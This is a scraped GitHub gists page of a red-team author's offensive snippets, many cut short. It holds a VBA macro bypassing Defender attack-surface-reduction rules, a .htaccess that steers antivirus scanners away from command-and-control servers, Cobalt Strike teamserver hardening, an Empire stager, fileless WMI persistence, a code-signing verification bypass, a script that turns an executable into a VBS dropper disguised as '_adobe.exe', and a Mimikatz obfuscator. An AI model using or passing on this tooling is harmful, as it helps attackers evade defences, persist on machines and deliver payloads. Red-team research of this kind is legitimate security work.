Skip to content

Instantly share code, notes, and snippets.

Rahmat Nurfauzi infosecn1nja

  • Jakarta, Indonesia
Block or report user

Report or block infosecn1nja

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from redirector:
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
@infosecn1nja
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active Aug 12, 2019
APT Group/Red Team Weaponization Phase
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
=======================================
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active Nov 14, 2019
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@infosecn1nja
infosecn1nja / Inject.cs
Created Jun 19, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@infosecn1nja
infosecn1nja / .htaccess
Created Jun 9, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
@infosecn1nja
infosecn1nja / wmic_starfighters.py
Created Jun 7, 2018
Empire stagers module to generates a squiblytwo and starfighters launcher.
View wmic_starfighters.py
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'wmic_xsl_starfighters',
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
@infosecn1nja
infosecn1nja / WMI-Persistence.ps1
Created May 14, 2018
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
View WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"
View SignatureVerificationAttack.ps1
$Host.Runspace.LanguageMode
Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe
# Try to execute the script. Add-Type will fail.
Import-Module C:\Demo\bypass_test.psm1
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +
'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
View exe2vbs.sh
#!/bin/bash
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'
View obfuscate-mimikatz.sh
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
You can’t perform that action at this time.